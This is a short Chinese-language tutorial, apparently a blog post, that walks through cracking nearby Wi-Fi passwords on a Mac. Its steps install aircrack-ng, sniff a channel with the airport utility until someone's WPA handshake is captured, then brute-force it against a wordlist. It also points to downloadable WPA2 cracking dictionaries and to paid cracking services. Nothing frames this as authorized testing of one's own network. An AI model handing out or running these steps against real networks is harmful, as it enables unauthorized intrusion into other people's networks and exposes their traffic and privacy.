1.首先安装aircrack-ng,我这里是通过brew包管理器安装的,在命令行输入以下命令安装aircrack-ng
brew search aircrack-ng
brew install aircrack-ng
sudo chown -R $(whoami) /usr/local
brew link aircrack-ng
2.安装好后,看看自己的网卡名字,输入以下命令可查看Wi-Fi名字
ifconfig
我这里有两个网卡,其中en0是有线网卡,en4是无线网卡。
3.查看附近的Wi-Fi
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s
4.开始监听,收集附近无线网的数据
sudo airport en4 sniff 1
参数en4是网卡的名字,数字1是网卡需要监听的网络频道。执行完这条命令后,就开启了监听,Wi-Fi图标会变成一只眼睛
这个时候等就行了。等有人连接附近的Wi-Fi,Mac就会捕捉到。监听就一点,然后使用ctrl+c停止监听,监听的数据会保存在/tmp/airportSniffYiQkan.cap.中
5.暴力破解密码
sudo aircrack-ng -w dict.txt /tmp/airportSniffYiQkan.cap
dict.txt是存放密码的文件。
运行完命令之后,会显示抓到的包,主要有三列,我们看最后一列
最后一列的值为WPA(1 handshake),说明抓取成功。
执行完命令之后他问你,目标网络的索引,这里我们输入42
密码找到了。就是字典里的第二个。理论上,只要字典足够大,就一定能跑出来。
关于字典去哪里找,网上有字典生成的软件,或者有直接的字典下载
wpa2破解字典下载-超大wpa2破解字典下载 - 多多软件站
上面那个就是已有的字典,可以拿去跑。或者拿去万能的某宝,找人跑也行。
本文只分享操作,不涉及理论。新人写文,请多多关照。